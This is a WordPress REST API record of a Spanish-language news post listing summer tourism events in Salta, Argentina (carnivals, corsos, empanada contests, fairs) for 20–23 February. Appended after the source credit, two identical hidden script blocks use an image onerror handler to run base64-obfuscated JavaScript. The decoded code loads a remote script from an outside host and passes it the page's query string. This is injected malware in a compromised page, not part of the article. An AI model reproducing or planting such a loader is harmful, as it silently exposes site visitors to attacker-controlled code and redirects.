{"id":4866,"date":"2025-02-20T12:17:14","date_gmt":"2025-02-20T15:17:14","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4866"},"modified":"2025-08-13T23:40:12","modified_gmt":"2025-08-14T02:40:12","slug":"disfruta-un-fin-de-semana-de-experiencias-turisticas-de-verano","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4866","title":{"rendered":"Disfrut\u00e1 un fin de semana de experiencias tur\u00edsticas de verano"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-b627a67b4857a15ce671a758cee06b0c\" style=\"background-color:#600e22\"><em>La Serenata a Cafayate en la Bodega Encantada comienza con su importante cartelera de artistas; adem\u00e1s, los corsos y el carnaval son algunas de las propuestas para disfrutar de las experiencias del verano en Salta.<\/em><\/h4>\n\n\n\n<p>Salte\u00f1os y visitantes pueden disfrutar el fin de semana desde hoy jueves 20 al s\u00e1bado 22 de febrero en Salta del carnaval en las regiones tur\u00edsticas de la provincia; asimismo de ferias con importante oferta gastron\u00f3mica y de emprendedores; festivales que como la Serenata a Cafayate en la Bodega Encantada convoca a una importante cartelera de artistas, adem\u00e1s, se llevar\u00e1 a cabo el Carnaval serenatero en la Plaza Michel Torino con un festival art\u00edstico musical al aire libre el viernes 21.<\/p>\n\n\n\n<p>El Carril celebra el s\u00e1bado 22 el aniversario de su Fundaci\u00f3n; la actividad comenzar\u00e1 a las 8 en la plaza San Mart\u00edn; a las 9 se celebrar\u00e1 la Misa y luego habr\u00e1 un reconocimiento a los vecinos ilustres y n\u00fameros alusivos a las fecha.<\/p>\n\n\n\n<p>Los corsos siguen llev\u00e1ndose a cabo en la provincia: el viernes 21, s\u00e1bado 22 y domingo 23 en Vaqueros el Corso de verano en la Costanera; en tanto en Tartagal el s\u00e1bado 22 y domingo 23 el Corso Color 2025 y en desde el viernes al domingo Seclant\u00e1s el Corso bagualeando serpentinas &nbsp;y en Luracatao el s\u00e1bado 22; por su parte, el domingo 23 los Corsos de la Familia con los Mu\u00f1equitos de Carlitos Meli\u00e1n se llevan a cabo en San Lorenzo.<\/p>\n\n\n\n<p>Adem\u00e1s, desde el 20 al 22 en el paseo de la Estaci\u00f3n se celebrar\u00e1 en San Jos\u00e9 de Met\u00e1n el Corso de las Estrellas; en tanto en San Carlos los corsos ser\u00e1n el viernes 21 y s\u00e1bado 22 &nbsp;en San Carlos tendr\u00e1. En la Ciudad de Salta tendr\u00e1n lugar los corsos al costado del estadio Martearena; en tanto en Rosario de la Frontera los Corsos de la Alegr\u00eda desde el jueves 20 al domingo 23.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/16104-disfruta-un-fin-de-semana-de-experiencias-turisticas-de-verano.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/16104-disfruta-un-fin-de-semana-de-experiencias-turisticas-de-verano.webp\" alt=\"Disfrut\u00e1 un fin de semana de experiencias tur\u00edsticas de verano\"\/><\/a><\/figure>\n\n\n\n<p>Otras de las experiencias que convocan a recorrer y vivir Salta son los concursos y ferias gastron\u00f3micos; as\u00ed, se llevar\u00e1n concursos de la empanada en distintas localidades: en Aguaray se realizar\u00e1 el jueves 20 el 4\u00ba concurso municipal de la empanada en la &nbsp;Plazoleta 20 de Febrero que culminar\u00e1 con acto el por el d\u00eda de la Batalla de Salta. En tanto, Guachipas celebrar\u00e1 su Concurso de la empanada el s\u00e1bado 22. Por otra parte, en San Carlos se realizar\u00e1 el 4to Concurso de la Empanada en un evento con ballets y artistas locales.<\/p>\n\n\n\n<p>En cuanto a Ferias, en el Pueblo de Palermo oeste, Payogasta, el s\u00e1bado 22, se realizar\u00e1 la 8va Fiesta Regional del Tomate con espect\u00e1culos de canto y danzas folcl\u00f3ricas, desfile de carrozas y juegos tradicionales. Por su parte, el domingo 23 en Chicoana se llevar\u00e1 a cabo la XIII\u00aa Feria del Choclo Capia con peque\u00f1os productores de El Rodeo y La Zanja. Paraje La Zanja, Acceso Km. 38 de la RP 33, tambi\u00e9n se har\u00e1 una ofrenda a la Pachamama; y en San Lorenzo, la Feria Gastron\u00f3mica El Zorzal en la plaza Ej\u00e9rcito Argentino.<\/p>\n\n\n\n<p>Estas son algunas de las experiencias para vivir el verano:<\/p>\n\n\n\n<p><strong>Jueves 20<\/strong><\/p>\n\n\n\n<p><strong>Cafayate<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Serenata a Cafayate. Bodega encantada. Reconocida por los Premios Bit\u00e1cora 2024 *<\/p>\n\n\n\n<p>*Hasta s\u00e1bado 22<\/p>\n\n\n\n<p><strong>Aguaray<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; 4\u00ba concurso municipal de la empanada. Plazoleta 20 de Febrero. Acto por el d\u00eda de la Batalla de Salta. Se degustar\u00e1n las empanadas en el concurso.<\/p>\n\n\n\n<p><strong>San Jos\u00e9 de Met\u00e1n<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corso de las Estrellas (Paseo de la Estaci\u00f3n)<\/p>\n\n\n\n<p><strong>San Antonio de los Cobres<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Visitas guiadas. Museo Regional Andino. Salas de Curiosidades, Geolog\u00eda, Biodiversidad, arqueolog\u00eda, historia, gobernaci\u00f3n de los Andes, territorio de los andes, miner\u00eda, Ramal C-14 *<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Exposici\u00f3n de hierbas medicinales. Museo Regional Andino. *<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Exposici\u00f3n de la muestra Salta: Testimonios Fotogr\u00e1ficos. Museo Regional Andino. *<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Avistaje de aves. Museo Regional Andino. Actividades did\u00e1cticas y recreativas, partida desde el museo por la Quebrada del B\u00faho. *<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Caminata por las serran\u00edas de cobres y el Paseo de la Cruz. Museo Regional Andino. Caminata diurna para observar la localidad e interpretar en el sendero de la Cruz, las costumbres y tradiciones locales. Con turno previos. *<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Taller de tejido. Mercado Artesanal. Aprendizaje sobre el proceso de esquila, hilado y tejido de prendas con lana de llama. * &nbsp;<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Taller de medicina ancestral. Mercado Artesanal. *<\/p>\n\n\n\n<p>* Estas actividades se realizar\u00e1n hasta el viernes 28 de febrero<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Trekking para ni\u00f1os con relatos de mitos y leyenda. Paraje Toconadito. &nbsp;Ni\u00f1os de 8 a 14 hs *<\/p>\n\n\n\n<p>* Jueves hasta el 27 de febrero<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Encuentro de contrapuntos. Museo Regional Andino. Encuentro de contrapuntos de compadres, canto con caja y contrapuntos<\/p>\n\n\n\n<p><strong>Ciudad de Salta<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Ciclo De Homenajes &#8211; M\u00fasica Bajo Las Estrellas. Paseo de los Poetas, Alvarado 1299.<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corsos de la Ciudad (Costado del estadio Martearena)<\/p>\n\n\n\n<p><strong>Rosario de la Frontera<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Baila Mi Barrio. Barrio Ram\u00f3n Abdala Barrio Los Inmigrantes Barrio Parque. Clases a cargo de los profesores de academia municipal<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corsos de la Alegr\u00eda (calle G\u00fcemes)<\/p>\n\n\n\n<p><strong>&nbsp; Viernes 21<\/strong><\/p>\n\n\n\n<p><strong>Cafayate<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp;Serenata a Cafayate. Bodega encantada. Reconocida por los Premios Bit\u00e1cora 2024 *<\/p>\n\n\n\n<p>\u00b7 &nbsp; Segunda Cajeada Serenatera (Concentraci\u00f3n en plaza 20 de Febrero)<\/p>\n\n\n\n<p><strong>*Hasta s\u00e1bado 22<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Carnaval Serenatero. Plaza Michel Torino. Festival Art\u00edstico musical al aire libre<\/p>\n\n\n\n<p><strong>San Jos\u00e9 de Met\u00e1n<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corso de las Estrellas (Paseo de la Estaci\u00f3n)<\/p>\n\n\n\n<p><strong>Tartagal<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Muestra de Colectividad Boliviana. Plazoleta Ciriaco Ben\u00edtez<\/p>\n\n\n\n<p><strong>San Antonio de los Cobres<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; Visitas guiadas. Museo Regional Andino. Salas de Curiosidades, Geolog\u00eda, Biodiversidad, arqueolog\u00eda, historia, gobernaci\u00f3n de los Andes, territorio de los andes, miner\u00eda, Ramal C-14 *<\/p>\n\n\n\n<p>\u2022 &nbsp; Exposici\u00f3n de hierbas medicinales. Museo Regional Andino. *<\/p>\n\n\n\n<p>\u2022 &nbsp; Exposici\u00f3n de la muestra Salta: Testimonios Fotogr\u00e1ficos. Museo Regional Andino. *<\/p>\n\n\n\n<p>\u2022 &nbsp; Avistaje de aves. Museo Regional Andino. Actividades did\u00e1cticas y recreativas, partida desde el museo por la Quebrada del B\u00faho. *<\/p>\n\n\n\n<p>\u2022 &nbsp; Caminata por las serran\u00edas de cobres y el Paseo de la Cruz. Museo Regional Andino. Caminata diurna para observar la localidad e interpretar en el sendero de la Cruz, las costumbres y tradiciones locales. Con turno previos. *<\/p>\n\n\n\n<p>\u2022 &nbsp; Taller de tejido. Mercado Artesanal. Aprendizaje sobre el proceso de esquila, hilado y tejido de prendas con lana de llama. * &nbsp;<\/p>\n\n\n\n<p>\u2022 &nbsp; Taller de medicina ancestral. Mercado Artesanal. *<\/p>\n\n\n\n<p><strong>* Jueves hasta el 27 de febrero<\/strong><\/p>\n\n\n\n<p><strong>Ciudad de Salta<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Luces de Paz y bien -Mapping San Francisco. Iglesia y Museo San Francisco (C\u00f3rdoba 15). Se suspende por lluvia<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; La Ciudad de las Pe\u00f1as (Plazoleta IV siglos)<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corsos de la Ciudad (Costado del estadio Martearena)<\/p>\n\n\n\n<p><strong>Vaqueros<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corsos de verano en la costanera. Desfile de comparsas<\/p>\n\n\n\n<p><strong>San Lorenzo<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Aprendiendo a bailar folclore. Quebrada de San Lorenzo<\/p>\n\n\n\n<p><strong>Rosario de la Frontera<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corsos de la Alegr\u00eda (Calle G\u00fcemes)<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Baila Mi Barrio. Barrios Ram\u00f3n Abdala, Los Inmigrantes y Parque. Clases a cargo de los profesores de academia municipal<\/p>\n\n\n\n<p><strong>Seclant\u00e1s<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corsos bagualeando serpentinas<\/p>\n\n\n\n<p><strong>San Carlos<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corsos oficiales<\/p>\n\n\n\n<p><strong>S\u00e1bado 22<\/strong><\/p>\n\n\n\n<p><strong>Vaqueros<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp;Corsos de verano. Costanera<\/p>\n\n\n\n<p>\u2022 &nbsp;Concurso de la empanada. Costanera. Preparaci\u00f3n de empanadas, sorteos, m\u00fasica en vivo<\/p>\n\n\n\n<p><strong>San Jos\u00e9 de Met\u00e1n<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corso de las Estrellas (Paseo de la Estaci\u00f3n)<\/p>\n\n\n\n<p><strong>Aguaray<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Sendero de la virgen de la lluvia. Tuyunti. Se vivir\u00e1 la experiencia de la fe y cultura de esta comunidad<\/p>\n\n\n\n<p><strong>Payogasta<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; 8\u00b0 Fiesta regional del Tomate. Pueblo de Palermo Oeste. Espect\u00e1culos de canto y danzas folcl\u00f3ricas con artistas consagrados, desfile carrozas y disfraces aleg\u00f3ricos, feria gastron\u00f3mica local, juegos tradicionales, exposiciones de la cultura local<\/p>\n\n\n\n<p><strong>Tartagal<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corso Color 2025. Avda. 20 de Febrero<\/p>\n\n\n\n<p><strong>Aguaray<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Sendero de la virgen de la lluvia en Tuyunti. En este circuito, se vivir\u00e1 la experiencia de la fe y cultura de esta comunidad.<\/p>\n\n\n\n<p><strong>El Galp\u00f3n<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Desentierro del carnaval. Caravana hacia la Liga de F\u00fatbol (Camping Municipal del r\u00edo Juramento).<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Festi Juramento<\/p>\n\n\n\n<p><strong>San Carlos<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; 4to Concurso Provincial de la Empanada en la plaza principal 4 de Noviembre<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corsos oficiales<\/p>\n\n\n\n<p><strong>San Antonio de los Cobres<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp;Visitas guiadas. Museo Regional Andino. Salas de Curiosidades, Geolog\u00eda, Biodiversidad, arqueolog\u00eda, historia, gobernaci\u00f3n de los Andes, territorio de los andes, miner\u00eda, Ramal C-14 *<\/p>\n\n\n\n<p>\u2022 &nbsp;Exposici\u00f3n de hierbas medicinales. Museo Regional Andino. *<\/p>\n\n\n\n<p>\u2022 &nbsp;Exposici\u00f3n de la muestra Salta: Testimonios Fotogr\u00e1ficos. Museo Regional Andino. *<\/p>\n\n\n\n<p>\u2022 &nbsp;Avistaje de aves. Museo Regional Andino. Actividades did\u00e1cticas y recreativas, partida desde el museo por la Quebrada del B\u00faho. *<\/p>\n\n\n\n<p>\u2022 &nbsp;Caminata por las serran\u00edas de cobres y el Paseo de la Cruz. Museo Regional Andino. Caminata diurna para observar la localidad e interpretar en el sendero de la Cruz, las costumbres y tradiciones locales. Con turno previos. *<\/p>\n\n\n\n<p>\u2022 &nbsp;Taller de tejido. Mercado Artesanal. Aprendizaje sobre el proceso de esquila, hilado y tejido de prendas con lana de llama. * &nbsp;<\/p>\n\n\n\n<p>\u2022 &nbsp;Taller de medicina ancestral. Mercado Artesanal. *<\/p>\n\n\n\n<p>* Jueves hasta el 27 de febrero<\/p>\n\n\n\n<p><strong>Ciudad de Salta<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Ferias Artesanales. Paseo de los Poetas (Esteco y Alvarado) Plaza G\u00fcemes (Balcarce y Leguizam\u00f3n), Paseo Balcarce (Balcarce al 700)<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Conociendo mi ciudad. Circuito Belgraniano. Actividad con cupo. Punto de encuentro Casa Moldes (Caseroos 711)<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corsos de la Ciudad (Costado del estadio Martearena)<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Cambio de Guardia de Honor<\/p>\n\n\n\n<p><strong>San Lorenzo<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corsos de la Familia con los Mu\u00f1equitos de Carlitos Meli\u00e1n. Calle 9 de Julio esq. San Mart\u00edn<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Feria Gastron\u00f3mica El Zorzal. Plaza Ej\u00e9rcito Argentino<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Aprendiendo a bailar folclore. Quebrada de San Lorenzo. Taller de danzas folcl\u00f3rica a cargo de las academias de danzas Misterio de Zamba y La Sanlorence\u00f1a<\/p>\n\n\n\n<p><strong>Seclant\u00e1s<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Corso bagualeando serpentinas<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; Luracatao. Corsos: copleros locales y artistas destacado<\/p>\n\n\n\n<p><strong>Cafayate<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Serenata a Cafayate. Bodega encantada<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Carnaval Serenatero. Plaza Michel Torino. Festival Art\u00edstico musical al aire libre<\/p>\n\n\n\n<p><strong>El Carril<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Aniversario de su Fundaci\u00f3n; la actividad comenzar\u00e1 a las 8 en la plaza San Mart\u00edn; a las 9 se celebrar\u00e1 la Misa y luego habr\u00e1 un reconocimiento a los vecinos ilustres y n\u00fameros alusivos a las fecha<\/p>\n\n\n\n<p>Rosario de la Frontera<\/p>\n\n\n\n<p>\u2022 Corsos de la Alegr\u00eda (calle G\u00fcemes)<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Baila Mi Barrio. Barrios Ram\u00f3n Abdala, Los Inmigrantes y Parque. Clases a cargo de los profesores de academia municipal<\/p>\n\n\n\n<p><strong>Domingo 23<\/strong><\/p>\n\n\n\n<p><strong>Chicoana<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; XIII\u00aa Feria del Choclo Capia &#8211; Peque\u00f1os Productores de El Rodeo y La Zanja. Paraje La Zanja, Acceso Km. 38 de la RP 33. Feria de Peque\u00f1os Productores. Izamiento de los Pabellones Nacional y Provincial. &nbsp;Ofrenda a la Pachamama \u201cMadre Tierra\u201d. Mateada con bollos caseros<\/p>\n\n\n\n<p><strong>&nbsp;Guachipas<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Concurso de la Empanada Guachipe\u00f1a. La mejor empanadera quien ser\u00e1 la embajadora que representara a Guachipas<\/p>\n\n\n\n<p><strong>Tartagal<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corso Color 2025. Avda. 20 de Febrero<\/p>\n\n\n\n<p><strong>&nbsp;San Antonio de los Cobres<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp;Visitas guiadas. Museo Regional Andino. Salas de Curiosidades, Geolog\u00eda, Biodiversidad, arqueolog\u00eda, historia, gobernaci\u00f3n de los Andes, territorio de los andes, miner\u00eda, Ramal C-14 *<\/p>\n\n\n\n<p>\u2022 &nbsp;Exposici\u00f3n de hierbas medicinales. Museo Regional Andino. *<\/p>\n\n\n\n<p>\u2022 &nbsp;Exposici\u00f3n de la muestra Salta: Testimonios Fotogr\u00e1ficos. Museo Regional Andino. *<\/p>\n\n\n\n<p>\u2022 &nbsp;Avistaje de aves. Museo Regional Andino. Actividades did\u00e1cticas y recreativas, partida desde el museo por la Quebrada del B\u00faho. *<\/p>\n\n\n\n<p>\u2022 &nbsp;Caminata por las serran\u00edas de cobres y el Paseo de la Cruz. Museo Regional Andino. Caminata diurna para observar la localidad e interpretar en el sendero de la Cruz, las costumbres y tradiciones locales. Con turno previos. *<\/p>\n\n\n\n<p>\u2022 &nbsp;Taller de tejido. Mercado Artesanal. Aprendizaje sobre el proceso de esquila, hilado y tejido de prendas con lana de llama. * &nbsp;<\/p>\n\n\n\n<p>\u2022 &nbsp;Taller de medicina ancestral. Mercado Artesanal. *<\/p>\n\n\n\n<p>* Jueves hasta el 27 de febrero<\/p>\n\n\n\n<p><strong>Vaqueros<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corsos de verano. Costanera. Desfile de comparsas<\/p>\n\n\n\n<p><strong>San Lorenzo<\/strong><\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Feria Gastron\u00f3mica El Zorzal. Plaza Ej\u00e9rcito Argentino. Oferta gastron\u00f3mica regional<\/p>\n\n\n\n<p>\u00b7 &nbsp; &nbsp; &nbsp; &nbsp; Corsos de la Familia con los Mu\u00f1equitos de Carlitos Meli\u00e1n. Calle 9 de Julio esq. San Mart\u00edn<\/p>\n\n\n\n<p><strong>Ciudad de Salta<\/strong><\/p>\n\n\n\n<p>\u2022 &nbsp;Corsos de la Ciudad (Costado del estadio Martearena)<\/p>\n\n\n\n<p>\u2022 &nbsp;Corsos de la Alegr\u00eda (calle G\u00fcemes)<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Serenata a Cafayate en la Bodega Encantada comienza con su importante cartelera de artistas; adem\u00e1s, los corsos y el carnaval son algunas de las propuestas para disfrutar de las experiencias del verano en Salta. Salte\u00f1os y visitantes pueden disfrutar el fin de semana desde hoy jueves 20 al s\u00e1bado 22 de febrero en Salta [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4867,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15,17],"tags":[],"class_list":{"0":"post-4866","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4866"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4866"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4866\/revisions"}],"predecessor-version":[{"id":6566,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4866\/revisions\/6566"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4867"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4866"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4866"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4866"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}